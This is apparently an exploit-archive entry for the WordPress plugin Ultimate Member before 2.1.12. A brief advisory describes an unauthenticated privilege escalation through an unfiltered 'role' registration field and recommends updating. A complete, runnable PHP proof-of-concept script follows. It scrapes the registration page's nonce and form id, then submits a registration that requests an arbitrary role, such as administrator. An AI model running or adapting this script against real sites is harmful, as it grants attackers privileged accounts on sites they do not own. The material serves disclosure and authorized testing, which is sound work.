
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Roles

2020-11-09 00:00:00
Chloe Chamberland


Ultimate Member versions before 2.1.12 did not filter the `role` parameter submitted with the registration form. An unauthenticated attacker could therefore add a `role` field to the registration request, set it to a WordPress role/capability value or any custom Ultimate Member role, and the newly created account was granted those privileges. Update to 2.1.12 or later; the proof of concept below must only be run against systems you are explicitly authorized to test.

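<?php

declare(strict_types=1);

// Proof of concept for Ultimate Member < 2.1.12 (WordPress): the registration
// handler trusted a client-supplied `role` field, so an unauthenticated visitor
// could register an account that is created with an arbitrary role.
//
// Usage:
//   php poc.php <wp_url> <username> <first_name> <last_name> <email> <um_role>
//
//   wp_url    site base URL; the registration form is assumed to be served at
//             <wp_url>/register (adjust below if the site uses another slug)
//   um_role   role to request, e.g. a WordPress role or a custom UM role
//
// Only run this against systems you are explicitly authorized to test.

if ($argc < 7) {
    fwrite(STDERR, "Usage: php {$argv[0]} <wp_url> <username> <first_name> <last_name> <email> <um_role>\n");
    exit(1);
}

[, $wp_url, $username, $name, $lastname, $email, $um_role] = $argv;

// Tolerate a trailing slash on the base URL.
$register_url = rtrim($wp_url, '/') . '/register';

/**
 * GET a page, following redirects, and return its body.
 *
 * Exits the script on a transport error so the regexes below never run
 * against an empty or partial response.
 */
function fetch_page(string $url): string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        $err = curl_error($ch);
        curl_close($ch);
        fwrite(STDERR, "GET {$url} failed: {$err}\n");
        exit(1);
    }
    curl_close($ch);

    return (string) $body;
}

// One GET is enough: both the nonce and the form id are embedded in the same
// registration page. (The original PoC fetched the page twice and reused the
// nonce from the first fetch without a cookie jar, so the nonce is presumably
// not session-bound for anonymous visitors -- verify if the POST is rejected.)
$page = fetch_page($register_url);

if (!preg_match('/_wpnonce"\svalue="([^"]+)"/', $page, $m)) {
    fwrite(STDERR, "Could not find _wpnonce at {$register_url}; is this the Ultimate Member registration page?\n");
    exit(1);
}
$nonce = $m[1];

if (!preg_match('/id=\"form_id_([^"]+)"/', $page, $m)) {
    fwrite(STDERR, "Could not find form_id at {$register_url}\n");
    exit(1);
}
$form_id = $m[1];

// Submit the registration form with the extra `role` field. On vulnerable
// versions the requested role is applied to the newly created user.
// CURLOPT_POSTFIELDS with an array sends multipart/form-data, as the original
// PoC did.
$ch = curl_init($register_url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => [
        'user_login-' . $form_id => $username,
        'first_name-' . $form_id => $name,
        'last_name-' . $form_id => $lastname,
        'user_email-' . $form_id => $email,
        'user_password-' . $form_id => 'StrongPassword123!',
        'confirm_user_password-' . $form_id => 'StrongPassword123!',
        // The unfiltered field that grants the role.
        'role' => $um_role,
        'form_id' => $form_id,
        // Fixed past value carried over from the original PoC; presumably only
        // needs to be in the past for the plugin's timing check -- verify if
        // registration is rejected.
        'timestamp' => '1603399250',
        'um_request' => '',
        '_wpnonce' => $nonce,
        '_wp_http_referer' => 'register',
    ],
]);

$output = curl_exec($ch);
if ($output === false) {
    $err = curl_error($ch);
    curl_close($ch);
    fwrite(STDERR, "POST {$register_url} failed: {$err}\n");
    exit(1);
}
curl_close($ch);

// Dump the response body. Confirm success by logging in with the chosen
// credentials and checking the role assigned to the new account.
echo $output;

?>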

